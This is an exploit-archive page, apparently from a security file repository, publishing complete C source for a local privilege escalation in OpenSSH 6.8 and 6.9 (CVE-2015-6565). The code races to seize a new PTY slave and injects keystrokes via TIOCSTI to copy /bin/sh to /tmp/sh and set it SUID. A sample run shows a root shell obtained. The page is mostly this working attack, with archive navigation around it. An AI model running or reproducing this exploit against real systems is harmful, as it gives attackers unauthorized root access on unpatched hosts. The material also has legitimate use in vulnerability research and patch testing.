OpenSSH 6.8 / 6.9 PTY Privilege Escalation

OpenSSH 6.8 / 6.9 PTY Privilege Escalation: Posted Jan 27, 2017; Authored by Federico Bento; OpenSSH versions 6.8 and 6.9 suffer from a PTY privilege escalation vulnerability.; tags | exploit; advisories | CVE-2015-6565; SHA-256 | 28567aff6803667664070680eb10edf5f2456dc7d56a05903e4edda14e08b17b; Download | Favorite | View

OpenSSH 6.8 / 6.9 PTY Privilege Escalation

/* 
 *  not_an_sshnuke.c
 *
 *  Federico Bento
 *
 *  up201407890 () alunos dcc fc up pt
 *  https://twitter.com/uid1000
 * 
 *  OpenSSH 6.8-6.9 local privilege escalation - CVE-2015-6565
 *  
 *  Considered mostly to be a "DoS", turns out to be a priv esc vuln.
 *  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6565
 *
 *  Shoutz to Jann Horn for the detailed analysis
 *  And also to all my elite colleagues, specially xSTF :)
 *
 *
 *  $ gcc not_an_sshnuke.c -o not_an_sshnuke
 *  $ ./not_an_sshnuke /dev/pts/3
 *  [*] Waiting for slave device /dev/pts/3
 *  [+] Got PTY slave /dev/pts/3
 *  [+] Making PTY slave the controlling terminal
 *  [+] SUID shell at /tmp/sh
 *  $ /tmp/sh --norc --noprofile -p
 *  # id
 *  euid=0(root) groups=0(root)
 *
 */
 
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
      
int main(int argc, char *argv[])
{
     char *cmd = "cp /bin/sh /tmp/sh; chmod u+s /tmp/sh\n";
     int pid, pts = -1;
 
     if(argc != 2) {
          fprintf(stderr, "Usage: %s /dev/pts/X\n", argv[0]);
      fprintf(stderr, "Where X is next slave device to be created\n");
      return 1;
     }
     
     if(!access(argv[1], F_OK)) {
          fprintf(stderr, "[-] %s device already exists\n", argv[1]);
          return 1;
     }
 
     pid = fork();
 
     if(pid < 0) {
      fprintf(stderr, "[-] fork failed\n");
      return 1;
     }
     
     if(pid == 0) {
          printf("[*] Waiting for slave device %s\n", argv[1]);
         
      /* win the race by opening the PTY slave before sshd's child */
      while(pts == -1)
           pts = open(argv[1], O_WRONLY); 
 
           printf("[+] Got PTY slave %s\n", argv[1]);
               printf("[+] Making PTY slave the controlling terminal\n");
         
           dup2(pts, 0); dup2(pts, 1); dup2(pts, 2);
           setsid();
               ioctl(0, TIOCSCTTY, 1);
 
           while(*cmd)
                ioctl(0, TIOCSTI, cmd++);
     }
 
     else {
          wait(NULL);
      printf("[+] SUID shell at /tmp/sh\n");
      return 0;
     }
}

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

OpenSSH 6.8 / 6.9 PTY Privilege Escalation

OpenSSH 6.8 / 6.9 PTY Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

OpenSSH 6.8 / 6.9 PTY Privilege Escalation

Share This

OpenSSH 6.8 / 6.9 PTY Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems